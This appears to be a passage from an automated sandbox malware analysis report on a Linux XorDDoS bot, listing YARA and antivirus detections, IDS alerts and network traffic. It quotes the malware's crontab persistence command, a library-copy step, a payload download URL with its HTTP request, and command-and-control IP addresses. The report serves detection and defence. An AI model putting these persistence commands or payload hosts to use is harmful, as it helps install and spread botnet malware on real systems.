        • 0x6b104:$st0: BB2FA36AAA9541F0
        • 0x6b114:$st0: BB2FA36AAA9541F0
        • 0x6b124:$st0: BB2FA36AAA9541F0
        • 0x6b134:$st0: BB2FA36AAA9541F0
        • 0x6b144:$st0: BB2FA36AAA9541F0
        • 0x6b154:$st0: BB2FA36AAA9541F0
        • 0x6b164:$st0: BB2FA36AAA9541F0
        • 0x6b174:$st0: BB2FA36AAA9541F0
        • 0x6b184:$st0: BB2FA36AAA9541F0
        • 0x6b194:$st0: BB2FA36AAA9541F0
        • 0x6b1a4:$st0: BB2FA36AAA9541F0
        • 0x6b1b4:$st0: BB2FA36AAA9541F0
        • 0x6b1c4:$st0: BB2FA36AAA9541F0
        • 0x6b1d4:$st0: BB2FA36AAA9541F0
        • 0x6b1e4:$st0: BB2FA36AAA9541F0
        • 0x6b1f4:$st0: BB2FA36AAA9541F0
        • 0x6b204:$st0: BB2FA36AAA9541F0
        Click to see the 33 entries
        SourceRuleDescriptionAuthorStrings
        10241.1.0000000008048000.00000000080cf000.r-x.sdmpJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
          10241.1.0000000008048000.00000000080cf000.r-x.sdmpMALWARE_Linux_XORDDoSDetects XORDDoSditekSHen
          • 0x863fb:$s1: for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
          • 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6
          • 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab
          • 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
          9656.1.0000000008048000.00000000080cf000.r-x.sdmpJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
            9656.1.0000000008048000.00000000080cf000.r-x.sdmpMALWARE_Linux_XORDDoSDetects XORDDoSditekSHen
            • 0x863fb:$s1: for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
            • 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6
            • 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab
            • 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
            9689.1.0000000008048000.00000000080cf000.r-x.sdmpJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
              Click to see the 235 entries
              Timestamp:192.168.2.2046.105.84.19041340532020381 07/27/22-09:48:16.981971
              SID:2020381
              Source Port:41340
              Destination Port:53
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2054.36.15.9950774802021336 07/27/22-09:48:16.811975
              SID:2021336
              Source Port:50774
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: dkuidbsedpAvira: detected
              Source: /lib/libudev.soAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/wrfeamwlubAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/wyyhrifhazAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/txflbjqefgAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/zetazkptwuAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/wgpgdetjweAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/zyapsjpajeAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/yfiimchuizAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/whtzopaggcAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/qvilroogszAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/kmavqzvhroAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/tudlcvpgbcAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/qjfxtxsijsAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /lib/libudev.soJoe Sandbox ML: detected
              Source: /usr/bin/wrfeamwlubJoe Sandbox ML: detected
              Source: /usr/bin/wyyhrifhazJoe Sandbox ML: detected
              Source: /usr/bin/txflbjqefgJoe Sandbox ML: detected
              Source: /usr/bin/zetazkptwuJoe Sandbox ML: detected
              Source: /usr/bin/wgpgdetjweJoe Sandbox ML: detected
              Source: /usr/bin/zyapsjpajeJoe Sandbox ML: detected
              Source: /usr/bin/yfiimchuizJoe Sandbox ML: detected
              Source: /usr/bin/whtzopaggcJoe Sandbox ML: detected
              Source: /usr/bin/qvilroogszJoe Sandbox ML: detected
              Source: /usr/bin/kmavqzvhroJoe Sandbox ML: detected
              Source: /usr/bin/tudlcvpgbcJoe Sandbox ML: detected
              Source: /usr/bin/qjfxtxsijsJoe Sandbox ML: detected
              Source: dkuidbsedpJoe Sandbox ML: detected
              Source: dkuidbsedpMalware Configuration Extractor: XorDDoS {"C2 list": []}
              Source: /tmp/dkuidbsedp (PID: 9446)Reads CPU info from proc file: /proc/cpuinfoJump to behavior

              Networking

              barindex
              Source: TrafficSnort IDS: 2021336 ET TROJAN DDoS.XOR Checkin via HTTP 192.168.2.20:50774 -> 54.36.15.99:80
              Source: TrafficSnort IDS: 2020381 ET TROJAN DDoS.XOR Checkin 192.168.2.20:41340 -> 46.105.84.190:53
              Source: global trafficTCP traffic: 192.168.2.20:41340 -> 46.105.84.190:53
              Source: global trafficTCP traffic: 192.168.2.20:58332 -> 51.89.52.12:53
              Source: unknownTCP traffic detected without corresponding DNS query: 51.89.52.12
              Source: dkuidbsedp, libudev.so.7.dr, wrfeamwlub.7.dr, wyyhrifhaz.7.dr, txflbjqefg.7.dr, zetazkptwu.7.dr, wgpgdetjwe.7.dr, zyapsjpaje.7.dr, yfiimchuiz.7.dr, whtzopaggc.7.dr, qvilroogsz.7.dr, kmavqzvhro.7.dr, tudlcvpgbc.7.dr, qjfxtxsijs.7.drString found in binary or memory: http://www.gnu.org/software/libc/bugs.html
              Source: dkuidbsedp, 9445.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9450.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9453.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9457.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9546.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9557.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9568.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9579.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9590.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9601.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9612.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9623.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9634.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9644.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9656.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9667.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9678.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9689.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9700.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9711.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9722.1.00000000ff850000.00000000ff871000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar
              Source: dkuidbsedp, 9445.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9450.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9453.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9457.1.00000000ff850000.00000000ff871000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9/t
              Source: dkuidbsedp, 10263.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10274.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10285.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10296.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10307.1.00000000ff850000.00000000ff871000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9gk
              Source: dkuidbsedp, 10208.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10219.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10230.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10241.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10252.1.00000000ff850000.00000000ff871000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9jv
              Source: dkuidbsedp, 10098.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10109.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10120.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10131.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10142.1.00000000ff850000.00000000ff871000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9km
              Source: dkuidbsedp, 10428.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10439.1.00000000ff850000.00000000ff871000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9lh
              Source: dkuidbsedp, 10373.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10384.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10395.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10406.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10417.1.00000000ff850000.00000000ff871000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9pn
              Source: dkuidbsedp, 9931.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9942.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9953.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9964.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9975.1.00000000ff850000.00000000ff871000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9qj
              Source: dkuidbsedp, 9546.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9557.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9568.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9579.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9590.1.00000000ff850000.00000000ff871000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9qv
              Source: dkuidbsedp, 10318.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10329.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10340.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10351.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10362.1.00000000ff850000.00000000ff871000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9rl
              Source: dkuidbsedp, 9988.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9999.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10010.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10021.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10032.1.00000000ff850000.00000000ff871000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9tu
              Source: dkuidbsedp, 9876.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9887.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9898.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9909.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9920.1.00000000ff850000.00000000ff871000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9tx
              Source: dkuidbsedp, 9711.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9722.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9733.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9744.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9755.1.00000000ff850000.00000000ff871000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9wg
              Source: dkuidbsedp, 10043.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10054.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10065.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10076.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10087.1.00000000ff850000.00000000ff871000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9wh
              Source: dkuidbsedp, 9656.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9667.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9678.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9689.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9700.1.00000000ff850000.00000000ff871000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9wr
              Source: dkuidbsedp, 9601.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9612.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9623.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9634.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9644.1.00000000ff850000.00000000ff871000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9wy
              Source: dkuidbsedp, 9821.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9832.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9843.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9854.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9865.1.00000000ff850000.00000000ff871000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9yf
              Source: dkuidbsedp, 10153.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10164.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10175.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10186.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10197.1.00000000ff850000.00000000ff871000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ze
              Source: dkuidbsedp, 9766.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9777.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9788.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9799.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9810.1.00000000ff850000.00000000ff871000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9zy
              Source: unknownDNS traffic detected: queries for: www1.gggatat456.com
              Source: global trafficHTTP traffic detected: GET /dd.rar HTTP/1.1Accept: */*Accept-Language: zh-cnUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)Host: www1.gggatat456.comConnection: Keep-Alive

              DDoS

              barindex
              Source: Yara matchFile source: dkuidbsedp, type: SAMPLE
              Source: Yara matchFile source: 10241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9656.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9689.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10153.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9999.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9644.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9568.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10032.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9821.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10417.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10307.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10197.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9623.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9678.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10428.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9799.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10120.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9733.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9964.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9777.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10098.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9909.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9612.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9854.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10043.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9920.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10010.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10186.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9887.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9700.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9755.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9711.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9450.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10230.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10142.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10054.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10373.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9975.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9810.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10318.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9865.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9988.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9942.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10450.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10065.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10219.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9579.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9722.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10076.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10175.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9601.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9590.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9788.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10109.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9843.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9766.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9953.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10021.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10087.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9931.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9667.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9744.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10164.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9898.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9634.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10252.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9832.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10362.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10131.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9876.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9445, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9450, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9453, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9457, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9546, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9557, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9568, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9579, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9590, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9601, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9612, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9623, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9634, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9644, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9656, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9667, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9678, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9689, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9700, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9711, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9722, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9733, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9744, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9755, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9766, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9777, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9788, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9799, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9810, type: MEMORYSTR
